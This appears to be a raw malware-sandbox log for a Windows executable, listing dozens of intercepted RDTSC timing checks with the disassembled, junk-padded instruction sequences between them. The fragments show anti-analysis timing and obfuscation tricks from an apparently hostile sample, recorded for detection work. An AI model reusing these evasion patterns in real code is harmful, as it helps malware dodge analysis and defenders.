Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D357 second address: B4D388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45628h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnc 00007FD934C45616h 0x00000010 jmp 00007FD934C4561Dh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D388 second address: B4D38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D38D second address: B4D393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D393 second address: B4D399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D4D5 second address: B4D4DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D4DD second address: B4D512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD934BC97DAh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 jng 00007FD934BC97D6h 0x0000001b jmp 00007FD934BC97E8h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D512 second address: B4D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D525 second address: B4D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6B3 second address: B4D6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FD934C45622h 0x0000000a jbe 00007FD934C45616h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6D2 second address: B4D6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 jng 00007FD934BC97FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FD934BC97E8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6FA second address: B4D6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B50D8B second address: B50D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B515C4 second address: B515CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934C4561Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B52EC6 second address: B52F3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD934BC97E1h 0x0000000e popad 0x0000000f push eax 0x00000010 jp 00007FD934BC97EEh 0x00000016 nop 0x00000017 xor edi, 4BAF29D1h 0x0000001d mov dword ptr [ebp+12463C3Bh], ebx 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D291Ah] 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D17F2h], ebx 0x00000033 pushad 0x00000034 xor dword ptr [ebp+12457359h], edx 0x0000003a mov dword ptr [ebp+122D1A57h], ecx 0x00000040 popad 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 je 00007FD934BC97D6h 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539AD second address: B539B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539B7 second address: B539BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B539BE second address: B539CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FD934C4561Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5638C second address: B56392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B585C7 second address: B585D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B58B2B second address: B58B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5999C second address: B599A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B599A0 second address: B59A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D2906h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FD934BC97D8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FD934BC97D8h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 call 00007FD934BC97E4h 0x0000004d call 00007FD934BC97DBh 0x00000052 xor ebx, 7CCD2F64h 0x00000058 pop ebx 0x00000059 pop ebx 0x0000005a mov edi, dword ptr [ebp+122D2E4Bh] 0x00000060 xchg eax, esi 0x00000061 jne 00007FD934BC97DEh 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FD934BC97E2h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B59BD6 second address: B59BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD934C45616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5ACB7 second address: B5ACBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5B974 second address: B5B986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C4561Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C93A second address: B5C93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C93E second address: B5C944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5BBF3 second address: B5BBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5C944 second address: B5C96D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD934C45628h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jp 00007FD934C45616h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5D921 second address: B5D927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB20 second address: B5CB2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD934C45616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB2B second address: B5CB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB39 second address: B5CB3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB3F second address: B5CB44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CB44 second address: B5CBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 mov cl, C5h 0x0000000b or ebx, dword ptr [ebp+122D29C6h] 0x00000011 popad 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D2A1Eh] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 mov bx, si 0x00000029 call 00007FD934C45624h 0x0000002e mov ebx, eax 0x00000030 pop edi 0x00000031 mov eax, dword ptr [ebp+122D0869h] 0x00000037 jp 00007FD934C4561Ch 0x0000003d mov ebx, dword ptr [ebp+122D2E14h] 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push esi 0x00000048 call 00007FD934C45618h 0x0000004d pop esi 0x0000004e mov dword ptr [esp+04h], esi 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc esi 0x0000005b push esi 0x0000005c ret 0x0000005d pop esi 0x0000005e ret 0x0000005f jbe 00007FD934C4561Bh 0x00000065 mov edi, 74904FE4h 0x0000006a mov edi, dword ptr [ebp+122D2986h] 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 ja 00007FD934C45618h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B5CBD6 second address: B5CBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007FD934BC97FCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD934BC97E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B629E0 second address: B629E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B629E4 second address: B629E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B61AF8 second address: B61B05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B639F2 second address: B639F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B639F6 second address: B639FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B639FB second address: B63A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B62B22 second address: B62B31 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B63A01 second address: B63A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D1B74h] 0x00000010 push 00000000h 0x00000012 sub edi, dword ptr [ebp+122D2916h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FD934BC97D8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 je 00007FD934BC97D9h 0x0000003a movzx edi, bx 0x0000003d mov di, 4243h 0x00000041 push eax 0x00000042 push eax 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B64A8C second address: B64A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B64A92 second address: B64A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B64A96 second address: B64A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B63CB1 second address: B63CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B669E3 second address: B669EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B669EF second address: B669F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B65CB9 second address: B65CC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B65CC3 second address: B65D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FD934BC97D6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FD934BC97E3h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD934BC97D8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+1244FD8Ch] 0x00000033 xor dword ptr [ebp+122D19CCh], esi 0x00000039 push dword ptr fs:[00000000h] 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FD934BC97D8h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov dword ptr fs:[00000000h], esp 0x00000061 mov eax, dword ptr [ebp+122D1079h] 0x00000067 push FFFFFFFFh 0x00000069 adc bl, 00000040h 0x0000006c push eax 0x0000006d jo 00007FD934BC97E0h 0x00000073 push eax 0x00000074 push edx 0x00000075 push edi 0x00000076 pop edi 0x00000077 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B66B02 second address: B66B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B66B09 second address: B66B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD934BC97D8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B66B1B second address: B66BA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b adc bx, 3894h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FD934C45618h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov bx, dx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jmp 00007FD934C45627h 0x00000040 mov eax, dword ptr [ebp+122D105Dh] 0x00000046 sbb bx, 436Bh 0x0000004b push FFFFFFFFh 0x0000004d mov dword ptr [ebp+1247A4F5h], eax 0x00000053 nop 0x00000054 jmp 00007FD934C45621h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jl 00007FD934C45618h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B70DD8 second address: B70DE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B710B7 second address: B710BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F0C second address: B72F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F16 second address: B72F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F1A second address: B72F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F26 second address: B72F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45625h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F3F second address: B72F49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD934BC97D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B72F49 second address: B72F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7BAF5 second address: B7BAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C1CE second address: B7C1ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FD934C45629h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C1ED second address: B7C1F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C1F9 second address: B7C1FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C33F second address: B7C398 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD934BC97D6h 0x00000008 jmp 00007FD934BC97E5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jp 00007FD934BC97DAh 0x00000015 pop ebx 0x00000016 push esi 0x00000017 jp 00007FD934BC97E2h 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 jmp 00007FD934BC97E8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C627 second address: B7C64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD934C45616h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD934C45629h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C64D second address: B7C663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C663 second address: B7C675 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007FD934C45616h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FD934C45616h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B7C811 second address: B7C815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B81AF0 second address: B81B0E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934C45616h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C4561Eh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B81B0E second address: B81B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B81B12 second address: B81B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B85E8A second address: B85EB0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD934BC97E4h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FD934BC97E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B85EB0 second address: B85EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B0ECCE second address: B0ECD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B84BD7 second address: B84BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B84BDD second address: B84BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B84BE1 second address: B84BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FD934C45618h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E7D0 second address: B4E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4E7D4 second address: B4E7DE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
